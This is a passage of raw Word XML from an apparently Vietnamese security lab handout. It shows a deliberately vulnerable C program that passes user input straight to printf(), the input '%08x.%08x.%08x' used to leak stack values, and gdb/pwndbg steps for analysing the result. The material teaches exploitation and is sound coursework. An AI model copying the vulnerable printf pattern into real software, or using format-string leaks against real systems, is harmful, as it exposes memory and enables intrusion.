              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>scanf</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"%s"</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3760B7" w14:textId="0543902B" w:rsidR="00F87E2F" w:rsidRPr="00F87E2F" w:rsidRDefault="00F87E2F" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>printf</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"%08x.%08x.%08x.%s</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="se"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="698638E6" w14:textId="053DF2E1" w:rsidR="00F87E2F" w:rsidRDefault="00F87E2F" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>printf</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="349B464E" w14:textId="68F2A887" w:rsidR="00BF0850" w:rsidRPr="00F87E2F" w:rsidRDefault="00BF0850" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">      printf(</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="s"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D41C963" w14:textId="3A91A0C2" w:rsidR="00F87E2F" w:rsidRPr="00F87E2F" w:rsidRDefault="00F87E2F" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="k"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="mi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E276914" w14:textId="137E77B8" w:rsidR="00F87E2F" w:rsidRPr="00F87E2F" w:rsidRDefault="00F87E2F" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="557DFC18" w14:textId="66109EC5" w:rsidR="002C328E" w:rsidRDefault="001E1B71" w:rsidP="001E1B71">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C172AB" w14:textId="095287DC" w:rsidR="001E1B71" w:rsidRDefault="0073446F" w:rsidP="001E1B71">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="284"/>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="001E1B71">
        <w:t xml:space="preserve">ile thực thi </w:t>
      </w:r>
      <w:r w:rsidR="001E1B71" w:rsidRPr="001E1B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>32 bit</w:t>
      </w:r>
      <w:r w:rsidR="001E1B71">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66618E1B" w14:textId="050A15EF" w:rsidR="001E1B71" w:rsidRDefault="001E1B71" w:rsidP="001E1B71">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="284"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Biên dịch sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-fno-stack-protector</w:t>
      </w:r>
      <w:r>
        <w:t>, do đó không dùng stack canary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8181C" w14:textId="50B6568F" w:rsidR="00837A4C" w:rsidRDefault="00837A4C" w:rsidP="001E1B71">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="284"/>
      </w:pPr>
      <w:r>
        <w:t>Dòng 6 in ra giá chị các biến a, b, c và chuỗi s, dòng 7 in ra chuỗi s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6180773A" w14:textId="5A6EA24A" w:rsidR="001E1B71" w:rsidRPr="001E1B71" w:rsidRDefault="001E1B71" w:rsidP="001E1B71">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="284"/>
      </w:pPr>
      <w:r>
        <w:t>Có lỗ h</w:t>
      </w:r>
      <w:r w:rsidR="00262637">
        <w:t>ổ</w:t>
      </w:r>
      <w:r>
        <w:t>ng format string ở dòng code printf() thứ 2</w:t>
      </w:r>
      <w:r w:rsidR="001C4D09">
        <w:t xml:space="preserve"> (dòng 7)</w:t>
      </w:r>
      <w:r>
        <w:t>, do nhận chuỗi s người dùng nhập vào làm tham số duy nhất cho printf().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280FAEE5" w14:textId="0132180C" w:rsidR="00953C90" w:rsidRPr="00317115" w:rsidRDefault="00317115" w:rsidP="00317115">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:ind w:left="993" w:hanging="993"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nhập chuỗi s bình thường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D14073" w14:textId="5AF57E45" w:rsidR="00317115" w:rsidRDefault="00317115" w:rsidP="00317115">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chạy chương trình </w:t>
      </w:r>
      <w:r w:rsidR="004061BF">
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:t>-leak và nhập 1 chuỗi bình thường dạng “Hello</w:t>
      </w:r>
      <w:r w:rsidR="00BF0850">
        <w:t>world</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="005D0DD4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F34FC" w14:textId="4975DEA8" w:rsidR="00BF0850" w:rsidRDefault="00F50FC9" w:rsidP="00BF0850">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49EBC1C6" wp14:editId="6E9D6121">
            <wp:extent cx="3683295" cy="896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874" cy="904040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="572CD7F6" w14:textId="77777777" w:rsidR="00AC62CA" w:rsidRDefault="00AC62CA" w:rsidP="00BF0850">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D15FF7" w14:textId="3592D426" w:rsidR="00317115" w:rsidRPr="00317115" w:rsidRDefault="00317115" w:rsidP="00317115">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:ind w:left="993" w:hanging="993"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nhập chuỗi s là 1 chuỗi định dạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BE3CDF" w14:textId="6451FAFD" w:rsidR="00317115" w:rsidRDefault="00317115" w:rsidP="00317115">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Chương trình có lỗ hổng format string ở dòng printf() thứ 2, trong đó chuỗi s có thể là 1 chuỗi định dạng (format string) để đọc 1 số dữ liệu từ trong stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A29EDF" w14:textId="6BC0B375" w:rsidR="00317115" w:rsidRDefault="00317115" w:rsidP="00317115">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Giả sử nhập s là 1 chuỗi có dạng “%08x.%08x.%08x”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4705F642" w14:textId="69B4AF75" w:rsidR="00317115" w:rsidRDefault="00E537E2" w:rsidP="00317115">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Giải thích</w:t>
      </w:r>
      <w:r w:rsidR="00317115" w:rsidRPr="00317115">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> ý nghĩa của chuỗi định dạng trên?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF9EF4" w14:textId="1E597EBC" w:rsidR="00317115" w:rsidRPr="00317115" w:rsidRDefault="00317115" w:rsidP="00317115">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Quan sát kết quả chương trình.</w:t>
      </w:r>
      <w:r w:rsidR="00D76768">
        <w:t xml:space="preserve"> Ở dòng </w:t>
      </w:r>
      <w:r w:rsidR="0080669F">
        <w:t>printf() thứ 2</w:t>
      </w:r>
      <w:r w:rsidR="00D76768">
        <w:t>, thay vì in ra giá trị chuỗi s, chương trình in ra 1 số giá trị nào đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E8149" w14:textId="61E703F7" w:rsidR="00317115" w:rsidRDefault="00F50FC9" w:rsidP="00317115">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="769010D0" wp14:editId="2E893621">
            <wp:extent cx="3311371" cy="831661"/>
            <wp:effectExtent l="0" t="0" r="3810"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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3350085" cy="841384"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2B412F" w14:textId="749C640F" w:rsidR="00317115" w:rsidRPr="00317115" w:rsidRDefault="00317115" w:rsidP="00317115">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:ind w:left="993" w:hanging="993"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phân tích kết quả nhận được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB77F7F" w14:textId="54FD2867" w:rsidR="00317115" w:rsidRPr="00317115" w:rsidRDefault="00317115" w:rsidP="00317115">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="284"/>
      </w:pPr>
      <w:r>
        <w:t>Ở bước 2, ta đã in ra được 1 số giá trị từ trong stack. Bước này sẽ tiến hành phân tích để giải thích vì sao có được các giá trị trên và đó là những giá trị ở vị trí nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E34867" w14:textId="4EFACD84" w:rsidR="00747EB0" w:rsidRDefault="00747EB0" w:rsidP="005806E4">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mở </w:t>
      </w:r>
      <w:r w:rsidR="00506FED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r w:rsidRPr="00747EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-leak</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> với gdb và xem code assembly của hàm main.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A7AE28" w14:textId="74F6198C" w:rsidR="00747EB0" w:rsidRDefault="00747EB0" w:rsidP="00747EB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ind w:left="142" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00747EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00747EB0">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00747EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r w:rsidRPr="00747EB0">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00506FED">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r w:rsidRPr="00747EB0">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFCAED5" w14:textId="1AF1716A" w:rsidR="00747EB0" w:rsidRPr="00747EB0" w:rsidRDefault="005D0DD4" w:rsidP="00747EB0">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ind w:left="142" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Hlk117685865"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:r w:rsidR="00747EB0" w:rsidRPr="00747EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00747EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00747EB0">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>disassemble main</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:p w14:paraId="489A2B61" w14:textId="0B3A70D4" w:rsidR="00F32BCA" w:rsidRDefault="00EB0375" w:rsidP="00F32BCA">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C071C34" wp14:editId="4F137F32">
            <wp:extent cx="4092970" cy="4154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895" cy="4167870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B043C0" w14:textId="6C389448" w:rsidR="002C328E" w:rsidRDefault="00F352EB" w:rsidP="005806E4">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quan sát thấy địa chỉ của </w:t>
      </w:r>
      <w:r w:rsidR="00512AD8">
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r>
        <w:t>dòng lệnh gọi hàm printf là ở địa chỉ 0x804</w:t>
      </w:r>
      <w:r w:rsidR="00F32BCA">
        <w:t>84ea</w:t>
      </w:r>
      <w:r w:rsidR="00512AD8">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00512AD8" w:rsidRPr="00512AD8">
        <w:t>0x80484f9</w:t>
      </w:r>
      <w:r>
        <w:t>. Ta</w:t>
      </w:r>
      <w:r w:rsidR="00E407D9">
        <w:t xml:space="preserve"> đặt breakpoint </w:t>
      </w:r>
      <w:r w:rsidR="005806E4">
        <w:t>tại</w:t>
      </w:r>
      <w:r w:rsidR="00512AD8">
        <w:t xml:space="preserve"> các</w:t>
      </w:r>
      <w:r w:rsidR="005806E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vị trí này và chạy chương trình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFCE480" w14:textId="30C5F2DD" w:rsidR="00F352EB" w:rsidRDefault="005D0DD4" w:rsidP="002D57B5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
